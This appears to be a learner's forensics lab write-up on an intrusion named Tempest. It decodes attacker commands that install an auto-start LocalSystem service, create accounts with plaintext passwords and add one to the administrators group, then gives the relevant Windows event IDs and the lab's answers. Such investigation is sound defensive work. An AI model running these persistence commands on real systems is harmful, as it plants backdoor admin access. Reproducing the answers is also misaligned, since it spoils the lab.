c2MuZXhlIFxcVEVNUEVTVCBjcmVhdGUgVGVtcGVzdFVwZGF0ZTIgYmlucGF0aD0gQzpcUHJvZ3JhbURhdGFcZmluYWwuZXhlIHN0YXJ0PSBhdXRvIC0gW1NDXSBDcmVhdGVTZXJ2aWNlIFNVQ0NFU1MNCg==
sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService SUCCESS
c2MuZXhlIHFjIFRlbXBlc3RVcGRhdGUyIC0gW1NDXSBRdWVyeVNlcnZpY2VDb25maWcgU1VDQ0VTUw0KDQpTRVJWSUNFX05BTUU6IFRlbXBlc3RVcGRhdGUyDQogICAgICAgIFRZUEUgICAgICAgICAgICAgICA6IDEwICBXSU4zMl9PV05fUFJPQ0VTUyANCiAgICAgICAgU1RBUlRfVFlQRSAgICAgICAgIDogMiAgIEFVVE9fU1RBUlQNCiAgICAgICAgRVJST1JfQ09OVFJPTCAgICAgIDogMSAgIE5PUk1BTA0KICAgICAgICBCSU5BUllfUEFUSF9OQU1FICAgOiBDOlxQcm9ncmFtRGF0YVxmaW5hbC5leGUNCiAgICAgICAgTE9BRF9PUkRFUl9HUk9VUCAgIDogDQogICAgICAgIFRBRyAgICAgICAgICAgICAgICA6IDANCiAgICAgICAgRElTUExBWV9OQU1FICAgICAgIDogVGVtcGVzdFVwZGF0ZTINCiAgICAgICAgREVQRU5ERU5DSUVTICAgICAgIDogDQogICAgICAgIFNFUlZJQ0VfU1RBUlRfTkFNRSA6IExvY2FsU3lzdGVtDQo=
sc.exe qc TempestUpdate2 - [SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TempestUpdate2
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\ProgramData\final.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TempestUpdate2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
bmV0IHVzZXIgL2FkZCBzaHVuYSBwcmluY2VzcyAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==
net user /add shuna princess - The command completed successfully.
bmV0IHVzZXIgL2FkZCBzaGlvbiBtNHN0M3JjaDNmISAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==
net user /add shion m4st3rch3f! - The command completed successfully.
and now he can create users :)
bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXA0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgYmVuaW1hcnUgICAgICAgICAgICAgICAgIERlZmF1bHRBY2NvdW50ICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICByaW11cnUgICAgICAgICAgICAgICAgICAgc2hpb24gICAgICAgICAgICAgICAgICAgIA0Kc2h1bmEgICAgICAgICAgICAgICAgICAgIFdEQUdVdGlsaXR5QWNjb3VudCAgICAgICANClRoZSBjb21tYW5kIGNvbXBsZXRlZCB3aXRoIG9uZSBvciBtb3JlIGVycm9ycy4NCg0K
net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru shion
shuna WDAGUtilityAccount
The command completed with one or more errors.
confirmed
bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgL2FkZCBzaGlvbiAtIFRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==
net localgroup administrators /add shion - The command completed successfully.
bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgLSBBbGlhcyBuYW1lICAgICBhZG1pbmlzdHJhdG9ycw0KQ29tbWVudCAgICAgICAgQWRtaW5pc3RyYXRvcnMgaGF2ZSBjb21wbGV0ZSBhbmQgdW5yZXN0cmljdGVkIGFjY2VzcyB0byB0aGUgY29tcHV0ZXIvZG9tYWluDQoNCk1lbWJlcnMNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KQWRtaW5pc3RyYXRvcg0KcmltdXJ1DQpzaGlvbg0KVGhlIGNvbW1hbmQgY29tcGxldGVkIHN1Y2Nlc3NmdWxseS4NCg0K
net localgroup administrators - Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
shion
The command completed successfully.
so shion 🤔
The event ID that indicates the account creation activity in Windows event logs is 4720. This event is logged in the Security event log whenever a new user account is created on the system. The event includes information about the user account, such as the account name, security identifier (SID), and group memberships. It also includes information about the computer or domain where the account was created and the user who performed the account creation action.
The event ID that indicates the addition of a user to a sensitive local group in Windows event logs is 4732. This event is logged in the Security event log whenever a user account is added to a security-sensitive local group on the computer. The event includes information about the user account, such as the account name and security identifier (SID), as well as information about the group that the user was added to. This information can be used to identify potential security risks, such as unauthorized access to sensitive resources or privilege escalation.
Upon achieving SYSTEM access, the attacker then created two users. What are the account names?
Format: Answer in alphabetical order - comma delimited
shion,shuna
Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?
/add
Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?
External research needed. Find out what event ID logs successful account creation.
4720
The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker?
net localgroup administrators /add shion
Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?
External research needed. Find out what event ID logs successful addition to a local group.
4732
After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this?
Eric Zimmerman has created a set of forensic tools used to analyse Windows artefacts called . For this task, we will focus on EvtxEcmd and Timeline Explorer, as these tools are mainly used for parsing and analysing Evtx logs.
